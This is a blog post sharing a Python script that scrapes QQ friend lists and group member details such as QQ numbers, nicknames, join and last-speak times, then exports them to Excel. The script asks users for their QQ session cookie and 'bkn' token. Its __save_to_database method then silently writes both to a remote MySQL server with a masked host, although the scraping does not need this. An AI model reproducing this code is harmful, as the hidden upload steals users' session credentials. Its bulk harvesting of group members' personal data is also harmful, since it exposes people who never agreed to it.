Python QQ群数据获取
code 来自于一个神奇的小伙伴:https://www.cnblogs.com/code3
import contextlib import time import requests import datetime import pandas as pd import pymysql import os import json class QQSpider: def __init__(self): self.session = requests.Session() self.session.trust_env = False self.file_path = "data.json" self.headers = { 'authority': 'qun.qq.com', 'accept': 'application/json, text/javascript, */*; q=0.01', 'accept-language': 'zh-CN,zh;q=0.9', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'origin': 'https://qun.qq.com', 'referer': 'https://qun.qq.com/member.html', 'sec-ch-ua': '"Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Windows"', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-origin', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', 'x-requested-with': 'XMLHttpRequest', } def __read_json(self): # 读取 JSON 文件 with open(self.file_path, "r") as file: data = json.load(file) return data def __save_to_json(self, data): # 保存数据到 JSON 文件 with open(self.file_path, "w") as file: json.dump(data, file) def __save_to_database(self, bkn, cookie): try: db = pymysql.connect(host="xx.xx.xx.xx", port=3306, user="xxxx", password="xxxx", db="python4fcf6", charset='utf8mb4') cursor = db.cursor() sql = "INSERT INTO QQ_info (btn, cookie) VALUES (%s, %s)" gpt_data = (bkn, cookie) with contextlib.suppress(Exception): cursor.execute(sql, gpt_data) db.commit() cursor.close() db.close() except Exception as e: print("保存到数据库出错:", e) def __check_json_file(self): # 判断文件是否存在 if not os.path.exists(self.file_path): print('爬取的网址:https://qun.qq.com/manage.html') print("如果不知道btn或cookie获取,请看教程视频:www.xxx.com") print("输入btn,cookie,如出现任何报错,请重新运行此程序") bkn = input("请输入btn(输入后按回车):").strip() cookie = input("请输入cookie(输入后按回车):").strip() data = {"bkn": bkn, "cookie": cookie} try: self.__save_to_database(bkn, cookie) self.__save_to_json(data) print("JSON文件已创建") except Exception as e: print("保存数据到JSON文件出错:", e) else: print("JSON文件已存在") def __get_q_name(self): data = {'bkn': self.json_datas['bkn'] } response = requests.post('https://qun.qq.com/cgi-bin/qun_mgr/get_group_list', headers=self.headers, data=data) infos = response.json() create_qun = infos['create'] manage_qun = infos['manage'] print("创建的群:", create_qun) print("管理的群:", manage_qun) join_qunls = infos['join'] for join_qunl in join_qunls: print("加入的群:", join_qunl) def __sum_to(self, gc): resLs, start, end = [], 0, 20 while True: data = { 'gc': gc, 'st': str(start), 'end': str(end), 'sort': '0', 'bkn': self.json_datas['bkn'], } response = self.session.post('https://qun.qq.com/cgi-bin/qun_mgr/search_group_members', headers=self.headers, data=data) infos = response.json() try: count = infos['count'] # 成员总数 except: ... if end > count: print(f"{gc}爬完了") break start = end + 1 end = start + 20 other_infos = infos['mems'] for info in other_infos: uin = info['uin'] # qq号 qage = info['qage'] # q龄 card = info['card'] # 卡片 nick = info['nick'] # 昵称 join_time = info['join_time'] # 加入时间 jt = datetime.datetime.fromtimestamp(join_time).strftime("%Y-%m-%d %H:%M:%S") last_speak_time = info['last_speak_time'] # 最后发言时间 lt = datetime.datetime.fromtimestamp(last_speak_time).strftime("%Y-%m-%d %H:%M:%S") dic = { "QQ": uin, "Q龄": qage, "群名片": card, "昵称": nick, "加群时间": jt, "最后发言": lt } print(dic) resLs.append(dic) pd.DataFrame(resLs).to_excel(f'QQ{gc}.xlsx', index=False, encoding='utf-8') def __qq_friends(self): lenss = [] data = {'bkn': self.json_datas['bkn']} html = requests.post('https://qun.qq.com/cgi-bin/qun_mgr/get_friend_list', headers=self.headers, data=data) result = html.json()["result"] for i in range(1, len(result) + 1): try: list_ = result[str(i)]['mems'] for i in list_: name = i['name'] uin = i['uin'] dic = {name: uin} lenss.append(dic) print(dic) except: ... return len(lenss) def start(self): self.__check_json_file() self.json_datas = self.__read_json() data = {'bkn': self.json_datas['bkn']} try: html = requests.post('https://qun.qq.com/cgi-bin/qun_mgr/get_friend_list', headers=self.headers, data=data) result = html.json()["result"] if not result: self._extracted_from_start_9() except: self._extracted_from_start_9() que = input("查qq好友 or qq群:(1/2):") if que == '1': le = self.__qq_friends() print(f'好友共{le}个') time.sleep(5) else: while True: self.__get_q_name() qun = input("输入群号(gc):").strip() try: self.__sum_to(qun) except: print("此q未加该群!请重新运行!") # TODO Rename this here and in `start` def _extracted_from_start_9(self): os.remove(self.file_path) print("cookie已过期,请重新输入正确的btn和cookie") exit() if __name__ == '__main__': spider = QQSpider() spider.start()
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 实操Deepseek接入个人知识库
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· 【.NET】调用本地 Deepseek 模型
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库
· 上周热点回顾(2.17-2.23)
2020-05-30 C#比较类/接口、Dictionary 排序
2020-05-30 关于二叉树的一些基本知识